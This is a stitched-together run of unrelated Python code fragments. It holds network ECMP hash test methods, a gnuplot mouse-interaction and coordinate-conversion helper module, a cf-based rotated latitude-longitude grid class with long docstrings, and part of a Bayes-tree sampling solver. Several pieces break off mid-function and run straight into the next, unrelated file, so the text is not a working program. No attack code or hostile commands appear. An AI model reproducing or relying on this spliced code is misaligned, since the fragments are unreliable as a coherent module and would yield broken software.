dst_vm_list = [right_vm_fixture]
si_fixture = ret_dict['si_fixture']
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_dest_port
@preposttest_wrapper
def test_ecmp_hash_protocol(self):
"""
Validates ecmp hash when only ip protocol is configured
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
service_mode = 'in-network-nat'
ecmp_hash = 'default'
config_level = "vn"
ret_dict = self.setup_ecmp_config_hash_svc(max_inst=max_inst,
service_mode=service_mode,
ecmp_hash=ecmp_hash,
config_level=config_level)
left_vn_fixture = ret_dict['left_vn_fixture']
right_vn_fixture = ret_dict['right_vn_fixture']
left_vm_fixture = ret_dict['left_vm_fixture']
right_vm_fixture = ret_dict['right_vm_fixture']
# ECMP Hash with only "ip_protocol"
ecmp_hash = {"ip_protocol": True}
config_level = "vn"
self.modify_ecmp_config_hash(ecmp_hash=ecmp_hash,
config_level=config_level,
right_vm_fixture=right_vm_fixture,
right_vn_fixture=right_vn_fixture)
# Verify ECMP Hash at Agent and control node
self.verify_ecmp_hash(ecmp_hash=ecmp_hash, vn_fixture=left_vn_fixture,
left_vm_fixture=left_vm_fixture,
right_vm_fixture=right_vm_fixture)
# Verify traffic from vn1 (left) to vn2 (right), with user specified
# flow count
flow_count = 5
si_fixture = ret_dict['si_fixture']
dst_vm_list = [right_vm_fixture]
self.verify_traffic_flow(left_vm_fixture, dst_vm_list,
si_fixture, left_vn_fixture,
ecmp_hash=ecmp_hash, flow_count=flow_count)
return True
# end test_ecmp_hash_protocol
@preposttest_wrapper
def test_ecmp_hash_deletion(self):
"""
Validates deletion of ecmp hash configuration. When explicit ecmp hash
is deleted, hashing should happen based upon default hash (5 tuple)
Maintainer : <EMAIL>
"""
# Bringing up the basic service chain setup.
max_inst = 2
# Copyright (c) 2011 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import re
import sys
import contextlib
@contextlib.contextmanager
def no_autorefresh(plot):
"""A `with' statement context manager to switch off autorefresh."""
if hasattr(plot, "autorefresh"):
saveautorefresh = plot.autorefresh
plot.autorefresh = False
else:
saveautorefresh = None
yield plot
if saveautorefresh is not None:
plot.autorefresh = saveautorefresh
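# Usage sketch for no_autorefresh (assumes `plot` is an xnuplot plot object
# that may expose an `autorefresh` attribute; otherwise the manager is a no-op):
#
#     with no_autorefresh(plot) as p:
#         p("set xrange [0:10]")  # no automatic replot while inside the block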
_getvar_pattern = re.compile("GETVAR_LEFT (.*) GETVAR_RIGHT")
def get_var(plot, varname, type_=str):
"""Get the value of a Gnuplot variable from plot."""
with no_autorefresh(plot) as plot2:
result = plot2("print \"GETVAR_LEFT \", %s, \" GETVAR_RIGHT\"" %
varname)
match = _getvar_pattern.search(result)
if not match:
return None
value = match.group(1)
if value is not None:
return type_(value)
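# Example use of get_var (returned values shown are illustrative only):
#
#     term = get_var(plot, "GPVAL_TERM")          # e.g. "x11"
#     xmin = get_var(plot, "GPVAL_X_MIN", float)  # e.g. 0.0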
def convert_coord(plot, axis, to_system, coord):
"""Convert coord from one system to the other.
The axis ranges are taken from the last plot, not necessarily the current
settings.
convert_coord(plot, "x", 2, x1) -> x2
"""
to_system = int(to_system)
from_system = 3 - to_system  # swap between systems 1 and 2
from_name = axis.upper() + ("2" if from_system == 2 else "")
to_name = axis.upper() + ("2" if to_system == 2 else "")
from_min = get_var(plot, "GPVAL_%s_MIN" % from_name, float)
from_max = get_var(plot, "GPVAL_%s_MAX" % from_name, float)
to_min = get_var(plot, "GPVAL_%s_MIN" % to_name, float)
to_max = get_var(plot, "GPVAL_%s_MAX" % to_name, float)
if None not in (from_min, from_max, to_min, to_max):
return to_min + (to_max - to_min) * \
(coord - from_min) / (from_max - from_min)
else:
return None
def _convert_given_coord(plot, axis, to_sys, c1=None, c2=None):
# Subroutine for convert_coords() below.
if to_sys is not None:
given = (c1 is not None, c2 is not None)
if given == (True, False):
from_sys = 1
c = c1
elif given == (False, True):
from_sys = 2
c = c2
else:
raise ValueError("exactly one of %s1, %s2 must be given" %
(axis, axis))
if int(to_sys) == from_sys:
return c
else:
return convert_coord(plot, axis, to_sys, c)
_axes_pattern = re.compile("^(x([12]))?(y([12]))?$")
def convert_coords(plot, to_axes, x1=None, y1=None, x2=None, y2=None):
"""Convert coordinates between the first and second systems.
The axis ranges are taken from the last plot, not necessarily the current
settings.
convert_coords(plot, "y2", y1=y1) -> y2
convert_coords(plot, "x1y2", x1=x1, y1=y1) -> (x1, y2)
"""
to_x_sys, to_y_sys = _axes_pattern.match(to_axes).group(2, 4)
to_x = _convert_given_coord(plot, "x", to_x_sys, c1=x1, c2=x2)
to_y = _convert_given_coord(plot, "y", to_y_sys, c1=y1, c2=y2)
ret = filter(None, (to_x, to_y))
if len(ret) == 2:
return ret
elif len(ret) == 1:
return ret[0]
def get_range_settings(plot, axis, system=1):
with no_autorefresh(plot) as plot2:
return _get_range_settings(plot, axis, system)
def _get_range_settings(plot, axis, system):
range_name = axis + ("range" if int(system) == 1 else "2range")
range_str = plot("show " + range_name)
pattern = ("set +" + range_name +
r" +\[ *([^ :]+) *: *([^ :]+) *\] +(no)?reverse")
match = re.search(pattern, range_str)
if not match:
return None
range_min, range_max = match.group(1), match.group(2)
range_min = (float(range_min) if range_min != "*" else None)
range_max = (float(range_max) if range_max != "*" else None)
setting = (range_min, range_max)
reversed = match.group(3) != "no"
if None not in setting:
# The GPVAL_ vars don't reflect Button-3 zoomed ranges, so use the
# non-auto ranges if set.
current = (setting if not reversed else (setting[1], setting[0]))
else:
name = axis.upper() + ("2" if int(system) == 2 else "")
current_min = get_var(plot, "GPVAL_%s_MIN" % name, float)
current_max = get_var(plot, "GPVAL_%s_MAX" % name, float)
current = (current_min, current_max)
return dict(setting=setting, reversed=reversed, current=current)
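# get_range_settings returns a dict (sketch): `setting` is the configured
# (min, max) pair with None for autoscaled ends, `reversed` reflects the
# set (no)reverse flag, and `current` is the range in effect for the last plot.
#
#     rng = get_range_settings(plot, "x", system=1)
#     xmin, xmax = rng["current"]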
def set_range(plot, axis, system, range, reverse=False, writeback=None):
range_name = axis + ("range" if int(system) == 1 else "2range")
range_min = ("%e" % range[0] if range[0] is not None else "*")
range_max = ("%e" % range[1] if range[1] is not None else "*")
reverse = (("reverse" if reverse else "noreverse")
if reverse is not None else None)
writeback = (("writeback" if writeback else "nowriteback")
if writeback is not None else None)
plot(" ".join(filter(None, ["set", range_name,
"[%s:%s]" % (range_min, range_max),
reverse, writeback])))
# TODO Events should probably be instances of their own class, rather than
# just a dict.
def get_last_event(plot):
with no_autorefresh(plot) as plot2:
return _get_last_event(plot2)
def _get_last_event(plot):
event = dict(button=get_var(plot, "MOUSE_BUTTON", int),
x1=get_var(plot, "MOUSE_X", float),
y1=get_var(plot, "MOUSE_Y", float),
x2=get_var(plot, "MOUSE_X2", float),
y2=get_var(plot, "MOUSE_Y2", float),
shift=bool(get_var(plot, "MOUSE_SHIFT", int)),
ctrl=bool(get_var(plot, "MOUSE_CTRL", int)),
alt=bool(get_var(plot, "MOUSE_ALT", int)),
char=get_var(plot, "MOUSE_CHAR"),
ascii=get_var(plot, "MOUSE_KEY", int))
if event["button"] is None or event["button"] == -1:
if event["ascii"] == -1:
event["event_type"] = "abnormal"
else:
event["event_type"] = "key"
else:
event["event_type"] = "click"
return event
def wait_for_event(plot, callback=None):
with no_autorefresh(plot) as plot2:
return _wait_for_event(plot2, callback)
def _wait_for_event(plot, callback):
should_continue = True
while should_continue:
plot.pause("mouse", "any")
event = get_last_event(plot)
should_continue = False
if callback is not None:
should_continue = callback(event)
if event["event_type"] == "abnormal":
should_continue = False
return event
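# Example callback for wait_for_event: return True to keep waiting, False to
# stop. Here we wait until a left click (button 1) occurs:
#
#     def until_left_click(event):
#         return not (event["event_type"] == "click" and event["button"] == 1)
#
#     event = wait_for_event(plot, until_left_click)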
_full_axes_pattern = re.compile("^x[12]y[12]$")
def _coord_keys(axes):
# Return e.g. ("x1", "y2") given "x1y2".
if not _full_axes_pattern.match(axes):
raise ValueError("invalid axes specifier: " + axes)
x_coord, y_coord = axes[:2], axes[2:]
return (x_coord, y_coord)
def get_line_segment(plot, axes="x1y1"):
with no_autorefresh(plot) as plot2:
return _get_line_segment(plot2, axes)
def _get_line_segment(plot, axes):
x_coord, y_coord = _coord_keys(axes)
points = []
def action(event):
if event["event_type"] == "click" and event["button"] == 1:
if len(points) == 0:
points.append((event[x_coord], event[y_coord]))
plot("set mouse ruler at %f,%f polardistance" %
(event["x1"], event["y1"]))
return True
elif len(points) == 1:
points.append((event[x_coord], event[y_coord]))
return False
elif event["event_type"] == "key" and event["ascii"] == 27: # Esc.
if len(points) == 0:
# Cancel line segment.
return False
elif len(points) == 1:
# Cancel first click.
points.pop()
plot("set mouse noruler")
return True
return True
wait_for_event(plot, action)
plot("set mouse noruler nopolardistance")
if len(points) < 2:
return None
return tuple(points)
def get_polyline(plot, axes="x1y1", vertex_callback=None):
with no_autorefresh(plot) as plot2:
return _get_polyline(plot2, axes, vertex_callback)
def _get_polyline(plot, axes, vertex_callback):
x_coord, y_coord = _coord_keys(axes)
points = []
def action(event):
if event["event_type"] == "click":
points.append((event[x_coord], event[y_coord]))
plot("set mouse ruler at %f,%f polardistance" %
(event["x1"], event["y1"]))
if vertex_callback is not None:
vertex_callback(points)
if event["button"] == 3:
return False
return True
elif event["event_type"] == "key":
if event["ascii"] == 27: # Esc.
if len(points):
# Cancel last point.
points.pop()
if vertex_callback is not None:
vertex_callback(points)
if len(points):
coord = convert_coords(plot, "x1y1",
**{x_coord: points[-1][0],
y_coord: points[-1][1]})
plot("set mouse ruler at %f,%f" % coord)
else:
plot("set mouse noruler")
return True
else:
# Cancel polyline.
points[:] = [None] # Marker for cancellation.
return False
elif event["ascii"] == 13: # Return.
return False
return True
event = wait_for_event(plot, action)
plot("set mouse noruler nopolardistance")
if len(points) and points[0] is None: # Cancelled.
return None
if event["event_type"] == "abnormal":
return None
return points
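# Usage sketch for get_polyline: left-click adds a vertex, right-click or
# Return finishes, Esc removes the last vertex (or cancels when none remain).
#
#     def on_vertex(points):
#         print("vertices so far:", len(points))
#
#     vertices = get_polyline(plot, axes="x1y1", vertex_callback=on_vertex)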
def input_polyline(plot, axes="x1y1", with_="lines", leave_polyline=True,
close_polygon=False):
if not isinstance(plot, list) or not hasattr(plot, "refresh"):
raise ValueError("plot must be an xnuplot.Plot instance")
with no_autorefresh(plot) as plot2:
return _input_polyline(plot2, axes, with_, leave_polyline,
close_polygon)
def _input_polyline(plot, axes, with_, leave_polyline, close_polygon):
x_coord, y_coord = _coord_keys(axes)
# We need to freeze the plot range so that it doesn't change.
xrange = get_range_settings(plot, "x", system=x_coord[1])
yrange = get_range_settings(plot, "y", system=y_coord[1])
set_range(plot, "x", x_coord[1], xrange["current"])
set_range(plot, "y", y_coord[1], yrange["current"])
with_spec = ("with " + with_ if with_ else None)
showing_polyline = [False]
plot_options = " ".join(filter(None, ["axes %s%s" % (x_coord, y_coord),
"notitle",
with_spec]))
def polyline_for_vertices(vertices):
vertex_data = "\n".join("%e %e" % (x, y) for x, y in vertices)
new_polyline = ((vertex_data, plot_options) if vertex_data else None)
return new_polyline
def vertices_changed(vertices):
changed = False
if showing_polyline[0]:
plot.pop()
showing_polyline[0] = False
changed = True
grid_longitude
coordinates in degrees for the desired grid. Must be
positive.
*Parameter example:* ::
grid_longitude_resolution=10
grid_latitude_grid_longitude_location: `str` or `int`, optional
The location of the grid_latitude and grid_longitude
coordinates in relation to their grid cells (i.e. their
bounds). This information is required to generate the
grid_latitude and grid_longitude bounds for each grid
coordinate. If not provided, set to default 'centre'.
The locations left and right are related to the
grid_longitude coordinates (X-axis), while the locations
lower and upper are related to the grid_latitude
coordinates (Y-axis). The orientation of the coordinate
system considered is detailed below.
.. seealso::
*latitude_longitude_location* in
`LatLonGrid.from_extent_and_resolution`
grid_north_pole_latitude: `int` or `float`
The true latitude (i.e. in `EPSG:4326`_) of the north
pole of the rotated grid in degrees North. This parameter
is required to project the rotated grid into a true
latitude-longitude coordinate system.
grid_north_pole_longitude: `int` or `float`
The true longitude (i.e. in `EPSG:4326`_) of the north
pole of the rotated grid in degrees East. This parameter
is required to project the rotated grid into a true
latitude-longitude coordinate system.
north_pole_grid_longitude: `int` or `float`, optional
The longitude of the true north pole in the rotated grid
in degrees. This parameter is optional to project the
rotated grid into a true latitude-longitude coordinate
system (i.e. `EPSG:4326`_). If not provided, set to
default value 0.
.. altitude_extent: pair of `float` or `int`, optional
The extent of altitude coordinate in metres for the
desired grid. The first element of the pair is the
location of the start of the extent along the altitude
coordinate, the second element of the pair is the
location of the end of the extent along the altitude
coordinate. May be any type that can be unpacked (e.g.
`tuple`, `list`, `numpy.ndarray`).
*Parameter example:* ::
altitude_extent=(0, 20)
.. altitude_resolution: `float` or `int`, optional
The spacing between two consecutive altitude coordinates
in metres for the desired grid.
*Parameter example:* ::
altitude_resolution=20
.. altitude_location: `str` or `int`, optional
The location of the altitude coordinates in relation to
their grid cells (i.e. their bounds). This information
is required to generate the altitude bounds for each
grid coordinate. If not provided, set to default
'centre'.
The locations top and bottom are related to the
altitude coordinate (Z-axis). The orientation of the
coordinate system considered is such that the positive
direction is upwards.
.. seealso::
*altitude_location* in `LatLonGrid.from_extent_and_resolution`
*Parameter example:* ::
altitude_location='centre'
.. _`EPSG:4326`: https://epsg.io/4326
:Returns: `RotatedLatLonGrid`
**Examples**
>>> sd = RotatedLatLonGrid.from_extent_and_resolution(
... grid_latitude_extent=(-1.1, 1.1),
... grid_longitude_extent=(-2.72, -0.96),
... grid_latitude_resolution=0.44,
... grid_longitude_resolution=0.44,
... grid_north_pole_latitude=38.0,
... grid_north_pole_longitude=190.0
... )
>>> print(sd)
RotatedLatLonGrid(
shape {Y, X}: (5, 4)
Y, grid_latitude (5,): [-0.88, ..., 0.88] degrees
X, grid_longitude (4,): [-2.5, ..., -1.18] degrees
Y_bounds (5, 2): [[-1.1, ..., 1.1]] degrees
X_bounds (4, 2): [[-2.72, ..., -0.96]] degrees
)
"""
inst = cls(
**cls._get_grid_from_extent_and_resolution(
grid_latitude_extent, grid_longitude_extent,
grid_latitude_resolution, grid_longitude_resolution,
grid_latitude_grid_longitude_location,
# altitude_extent, altitude_resolution, altitude_location
),
grid_north_pole_latitude=grid_north_pole_latitude,
grid_north_pole_longitude=grid_north_pole_longitude,
north_pole_grid_longitude=north_pole_grid_longitude
)
inst._extent = {
# 'Z': altitude_extent,
'Y': grid_latitude_extent,
'X': grid_longitude_extent
}
inst._resolution = {
# 'Z': altitude_resolution,
'Y': grid_latitude_resolution,
'X': grid_longitude_resolution
}
inst._location = {
# 'Z': altitude_location,
'YX': grid_latitude_grid_longitude_location
}
return inst
@classmethod
def from_field(cls, field):
"""Instantiate a `RotatedLatLonGrid` from spatial dimension
coordinates of a `cf.Field`.
:Parameters:
field: `cf.Field`
The field object that will be used to instantiate a
`RotatedLatLonGrid` instance. This field must feature a
'grid_latitude' and a 'grid_longitude' dimension
coordinates, and these must feature bounds. In addition,
the parameters required for the conversion of the grid
to a true latitude-longitude reference system must be set
(i.e. grid_north_pole_latitude, grid_north_pole_longitude,
and optional north_pole_grid_longitude).
..
This field may optionally feature an 'altitude'
dimension coordinate alongside its bounds (both
required otherwise ignored).
:Returns: `RotatedLatLonGrid`
**Examples**
Instantiating from a 2D field:
>>> import cf
>>> f = cf.Field()
>>> lat = f.set_construct(
... cf.DimensionCoordinate(
... properties={'standard_name': 'grid_latitude',
... 'units': 'degrees',
... 'axis': 'Y'},
... data=cf.Data([-0.88, -0.44, 0., 0.44, 0.88]),
... bounds=cf.Bounds(data=cf.Data([[-1.1, -0.66], [-0.66, -0.22],
... [-0.22, 0.22], [0.22, 0.66],
... [0.66, 1.1]]))
... ),
... axes=f.set_construct(cf.DomainAxis(size=5))
... )
>>> lon = f.set_construct(
... cf.DimensionCoordinate(
... properties={'standard_name': 'grid_longitude',
... 'units': 'degrees',
... 'axis': 'X'},
... data=cf.Data([-2.5, -2.06, -1.62, -1.18]),
... bounds=cf.Bounds(data=cf.Data([[-2.72, -2.28], [-2.28, -1.84],
... [-1.84, -1.4], [-1.4, -0.96]]))
... ),
... axes=f.set_construct(cf.DomainAxis(size=4))
... )
>>> crs = f.set_construct(
... cf.CoordinateReference(
... coordinate_conversion=cf.CoordinateConversion(
... parameters={'grid_mapping_name': 'rotated_latitude_longitude',
... 'grid_north_pole_latitude': 38.0,
... 'grid_north_pole_longitude': 190.0}),
... coordinates=(lat, lon)
... )
... )
>>> sd = RotatedLatLonGrid.from_field(f)
>>> print(sd)
RotatedLatLonGrid(
shape {Y, X}: (5, 4)
Y, grid_latitude (5,): [-0.88, ..., 0.88] degrees
X, grid_longitude (4,): [-2.5, ..., -1.18] degrees
Y_bounds (5, 2): [[-1.1, ..., 1.1]] degrees
X_bounds (4, 2): [[-2.72, ..., -0.96]] degrees
)
Using the field interface back and forth:
>>> sd1 = RotatedLatLonGrid.from_extent_and_resolution(
... grid_latitude_extent=(-1.1, 1.1),
... grid_longitude_extent=(-2.72, -0.96),
... grid_latitude_resolution=0.44,
... grid_longitude_resolution=0.44,
... grid_north_pole_latitude=38.0,
... grid_north_pole_longitude=190.0
... )
>>> sd2 = RotatedLatLonGrid.from_field(sd1.to_field())
>>> sd2 == sd1
True
.. Instantiating from a 3D field:
..
.. >>> import cf
.. >>> f = cf.Field()
.. >>> lat = f.set_construct(
.. ... cf.DimensionCoordinate(
.. ... properties={'standard_name': 'grid_latitude',
.. ... 'units': 'degrees',
.. ... 'axis': 'Y'},
.. ... data=cf.Data([-0.88, -0.44, 0., 0.44, 0.88]),
.. ... bounds=cf.Bounds(data=cf.Data([[-1.1, -0.66], [-0.66, -0.22],
.. ... [-0.22, 0.22], [0.22, 0.66],
.. ... [0.66, 1.1]]))
.. ... ),
.. ... axes=f.set_construct(cf.DomainAxis(size=5))
.. ... )
.. >>> lon = f.set_construct(
.. ... cf.DimensionCoordinate(
.. ... properties={'standard_name': 'grid_longitude',
.. ... 'units': 'degrees',
.. ... 'axis': 'X'},
.. ... data=cf.Data([-2.5, -2.06, -1.62, -1.18]),
.. ... bounds=cf.Bounds(data=cf.Data([[-2.72, -2.28], [-2.28, -1.84],
.. ... [-1.84, -1.4], [-1.4, -0.96]]))
.. ... ),
.. ... axes=f.set_construct(cf.DomainAxis(size=4))
.. ... )
.. >>> alt = f.set_construct(
.. ... cf.DimensionCoordinate(
.. ... properties={'standard_name': 'altitude',
.. ... 'units': 'm',
.. ... 'axis': 'Z'},
.. ... data=cf.Data([10]),
.. ... bounds=cf.Bounds(data=cf.Data([[0, 20]]))
.. ... ),
.. ... axes=f.set_construct(cf.DomainAxis(size=1))
.. ... )
.. >>> crs = f.set_construct(
.. ... cf.CoordinateReference(
.. ... coordinate_conversion=cf.CoordinateConversion(
.. ... parameters={'grid_mapping_name': 'rotated_latitude_longitude',
.. ... 'grid_north_pole_latitude': 38.0,
.. ... 'grid_north_pole_longitude': 190.0}),
.. ... coordinates=(lat, lon)
.. ... )
.. ... )
.. >>> sd = RotatedLatLonGrid.from_field(f)
.. >>> print(sd)
.. RotatedLatLonGrid(
.. shape {Y, X}: (1, 5, 4)
.. Y, grid_latitude (5,): [-0.88, ..., 0.88] degrees
.. X, grid_longitude (4,): [-2.5, ..., -1.18] degrees
.. Z_bounds (1, 2): [[0, 20]] m
.. Y_bounds (5, 2): [[-1.1, ..., 1.1]] degrees
.. X_bounds (4, 2): [[-2.72, ..., -0.96]] degrees
.. )
"""
extraction_xyz = cls._extract_xyz_from_field(field)
extraction_param = cls._extract_crs_rotation_parameters_from_field(field)
return cls(grid_latitude=extraction_xyz['Y'],
grid_longitude=extraction_xyz['X'],
grid_latitude_bounds=extraction_xyz['Y_bounds'],
grid_longitude_bounds=extraction_xyz['X_bounds'],
# altitude=extraction_xyz['Z'],
# altitude_bounds=extraction_xyz['Z_bounds'],
**extraction_param)
def to_config(self):
cfg = super(RotatedLatLonGrid, self).to_config()
cfg.update(
self._extract_crs_rotation_parameters_from_field(self._f)
)
return cfg
@property
def coordinate_reference(self):
"""Return the coordinate reference of the RotatedLatLonGrid
instance as a `cf.CoordinateReference` instance.
"""
return self._f.coordinate_reference(
'grid_mapping_name:rotated_latitude_longitude'
)
@classmethod
def _extract_crs_rotation_parameters_from_field(cls, field):
# check conversion parameters
if field.coordinate_reference(
'grid_mapping_name:rotated_latitude_longitude',
default=False
):
crs = field.coordinate_reference(
'grid_mapping_name:rotated_latitude_longitude'
)
else:
raise RuntimeError(
f"{cls.__name__} field missing coordinate conversion "
f"'grid_mapping_name:rotated_latitude_longitude"
)
if crs.coordinate_conversion.has_parameter('grid_north_pole_latitude'):
grid_north_pole_lat = crs.coordinate_conversion.get_parameter(
'grid_north_pole_latitude')
else:
raise RuntimeError(
f"{cls.__name__} field coordinate conversion missing "
f"property 'grid_north_pole_latitude'"
)
if crs.coordinate_conversion.has_parameter('grid_north_pole_longitude'):
grid_north_pole_lon = crs.coordinate_conversion.get_parameter(
'grid_north_pole_longitude')
else:
raise RuntimeError(
f"{cls.__name__} field coordinate conversion missing "
f"property 'grid_north_pole_longitude'"
)
if crs.coordinate_conversion.has_parameter('north_pole_grid_longitude'):
north_pole_grid_lon = crs.coordinate_conversion.get_parameter(
'north_pole_grid_longitude')
else:
north_pole_grid_lon = 0.
return {
'grid_north_pole_latitude': grid_north_pole_lat,
'grid_north_pole_longitude': grid_north_pole_lon,
'north_pole_grid_longitude': north_pole_grid_lon
}
def _set_crs_parameters(self, grid_north_pole_latitude,
grid_north_pole_longitude,
north_pole_grid_longitude):
# WGS84
coord_conversion = cf.CoordinateConversion(
parameters={'grid_mapping_name': 'latitude_longitude',
'unit_conversion_factor': 0.0174532925199433})
datum = cf.Datum(
parameters={'geographic_crs_name': 'WGS 84',
'horizontal_datum_name': 'WGS_1984',
'semi_major_axis': 6378137.0,
'inverse_flattening': 298.257223563,
'longitude_of_prime_meridian': 0.0}
)
self._f.set_construct(
cf.CoordinateReference(
datum=datum,
coordinate_conversion=coord_conversion,
coordinates=[self._f.dim(self._Y_name, key=True),
self._f.dim(self._X_name, key=True),
self._f.aux('latitude', key=True),
self._f.aux('longitude', key=True)]
)
)
# Rotated Grid
coord_conversion = cf.CoordinateConversion(
parameters={'grid_mapping_name': 'rotated_latitude_longitude',
'unit_conversion_factor': 0.0174532925199433,
'grid_north_pole_latitude':
grid_north_pole_latitude,
'grid_north_pole_longitude':
grid_north_pole_longitude,
'north_pole_grid_longitude':
north_pole_grid_longitude}
)
datum = cf.Datum(
parameters={'horizontal_datum_name': 'WGS_1984',
'semi_major_axis': 6378137.0,
'inverse_flattening': 298.257223563,
'longitude_of_prime_meridian': 0.0}
)
self._f.set_construct(
cf.CoordinateReference(
datum=datum,
coordinate_conversion=coord_conversion,
coordinates=[self._f.dim(self._Y_name, key=True),
self._f.dim(self._X_name, key=True),
self._f.aux('latitude', key=True),
self._f.aux('longitude', key=True)]
)
)
def _check_crs_rotation_parameters(self, coord_ref):
if hasattr(coord_ref, 'coordinate_conversion'):
# eliminate 'unit'/'units' parameter as it is not standardised in
# the CF convention, and the split of the coordinate reference into
# coordinate conversion/datum is a CF data model artifact
and separator vars,
recycle the density model in the old clique and convert it to that in the new clique.
"""
raise NotImplementedError("Implementation depends on probabilistic modeling")
def clique_density_to_separator_factor(self,
separator_var_list: List[Variable],
density_model,
true_obs: np.ndarray) -> CliqueSeparatorFactor:
"""
extract marginal of separator variables from clique density as separator factor
"""
raise NotImplementedError("Implementation depends on probabilistic modeling")
def incremental_inference(self,
timer: List[float] = None,
clique_dim_timer: List[List[float]] = None,
*args, **kwargs
):
self.fit_tree_density_models(timer=timer,
clique_dim_timer=clique_dim_timer,
*args, **kwargs)
if self._args.adaptive_posterior_sampling is None:
self._samples = self.sample_posterior(timer=timer, *args, **kwargs)
else:
self._samples = self.adaptive_posterior(timer=timer, *args, **kwargs)
return self._samples
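# Usage sketch for incremental_inference (assumes a concrete subclass that
# implements the probabilistic-modeling hooks declared in this class, e.g.
# fit_clique_density_model; the subclass name and constructor below are
# hypothetical):
#
#     solver = MyNestedSamplingSolver(args)
#     for node in nodes: solver.add_node(node)
#     for factor in factors: solver.add_factor(factor)
#     solver.update_physical_and_working_graphs()
#     samples = solver.incremental_inference()  # dict: Variable -> np.ndarray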
def fit_clique_density_model(self,
clique,
samples,
var_ordering,
timer,
*args, **kwargs) -> "ConditionalSampler":
raise NotImplementedError("Implementation depends on probabilistic modeling.")
def adaptive_posterior(self, timer: List[float] = None, *args, **kwargs
) -> Dict[Variable, np.ndarray]:
"""
Generate samples for all variables
"""
raise NotImplementedError("Implementation depends on density models.")
def fit_tree_density_models(self,
timer: List[float] = None,
clique_dim_timer: List[List[float]] = None,
*args, **kwargs):
"""
By the order of Bayes tree, perform local sampling and training
on all cliques
:return:
"""
self._temp_training_loss = {}
clique_ordering = self._working_bayes_tree.clique_ordering()
total_clique_num = len(clique_ordering)
clique_cnt = 1
before_clique_time = time.time()
while clique_ordering:
start_clique_time = time.time()
clique = clique_ordering.pop()
if clique in self._clique_density_model:
end_clique_time = time.time()
print(f"\tTime for clique {clique_cnt}/{total_clique_num}: " + str(
end_clique_time - start_clique_time) + " sec, "
"total time elapsed: " + str(
end_clique_time - before_clique_time) + " sec")
clique_cnt += 1
if (clique_dim_timer is not None):
clique_dim_timer.append([clique.dim, end_clique_time - before_clique_time])
continue
# local sampling
sampler_start = time.time()
local_samples, sample_var_ordering, true_obs = \
self.clique_training_sampler(clique,
num_samples=self._args.local_sample_num,
method=self._args.local_sampling_method)
sampler_end = time.time()
if timer is not None:
timer.append(sampler_end - sampler_start)
self._clique_true_obs[clique] = true_obs
if self._args.store_clique_samples:
self._clique_samples[clique] = local_samples
local_density_model = \
self.fit_clique_density_model(clique=clique,
samples=local_samples,
var_ordering=sample_var_ordering,
timer=timer)
self._clique_density_model[clique] = local_density_model
new_separator_factor = None
if clique.separator:
# extract new factor over separator
separator_list = sorted(clique.separator,
key=lambda x:
self._reverse_ordering_map[x])
new_separator_factor = self.clique_density_to_separator_factor(separator_list,
local_density_model,
true_obs)
self._implicit_factors[clique] = new_separator_factor
self._working_graph = self._working_graph.eliminate_clique_variables(clique=clique,
new_factor=new_separator_factor)
end_clique_time = time.time()
print(f"\tTime for clique {clique_cnt}/{total_clique_num}: " + str(
end_clique_time - start_clique_time) + " sec, "
"total time elapsed: " + str(
end_clique_time - before_clique_time) + " sec" + ", clique_dim is " + str(clique.dim))
if (clique_dim_timer is not None):
clique_dim_timer.append([clique.dim, end_clique_time - before_clique_time])
clique_cnt += 1
def clique_training_sampler(self, clique: BayesTreeNode, num_samples: int, method: str):
r""" This function returns training samples, simulated variables, and unused observations
"""
graph = self._working_graph.get_clique_factor_graph(clique)
variable_pattern = \
self._working_bayes_tree.clique_variable_pattern(clique)
if method == "direct":
sampler = SimulationBasedSampler(factors=graph.factors, vars=variable_pattern)
samples, var_list, unused_obs = sampler.sample(num_samples)
elif method == "nested" or method == "dynamic nested":
ns_sampler = GlobalNestedSampler(nodes=variable_pattern, factors=graph.factors)
samples = ns_sampler.sample(live_points=num_samples, sampling_method=method)
var_list = variable_pattern
unused_obs = np.array([])
else:
raise ValueError("Unknown sampling method.")
return samples, var_list, unused_obs
def sample_posterior(self, timer: List[float] = None, *args, **kwargs
) -> Dict[Variable, np.ndarray]:
"""
Generate samples for all variables
"""
num_samples = self._args.posterior_sample_num
start = time.time()
stack = [self._physical_bayes_tree.root]
samples = {}
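# Top-down pass over the Bayes tree: the root clique's frontal variables are
# sampled unconditionally, while every other clique is sampled conditioned on
# the samples already drawn for its separator variables (stacked together with
# any true observations attached to that clique).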
while stack:
# Retrieve the working clique
clique = stack.pop()
# Local sampling
frontal_list = sorted(clique.frontal,
key=lambda x: self._reverse_ordering_map[x])
separator_list = sorted(clique.separator,
key=lambda x: self._reverse_ordering_map[x])
clique_density_model = self._clique_density_model[clique]
obs = self._clique_true_obs[clique]
aug_separator_samples = np.zeros(shape=(num_samples, 0))
if len(obs) != 0:
aug_separator_samples = np.tile(obs, (num_samples, 1))
for var in separator_list:
aug_separator_samples = np.hstack((aug_separator_samples,
samples[var]))
if aug_separator_samples.shape[1] != 0:
frontal_samples = clique_density_model. \
conditional_sample_given_observation(conditional_dim=clique.frontal_dim,
obs_samples=aug_separator_samples)
else: # the root clique
frontal_samples = clique_density_model. \
conditional_sample_given_observation(conditional_dim=clique.frontal_dim,
sample_number=num_samples)
# Dispatch samples
cur_index = 0
for var in frontal_list:
samples[var] = frontal_samples[:,
cur_index: cur_index + var.dim]
cur_index += var.dim
if clique.children:
for child in clique.children:
stack.append(child)
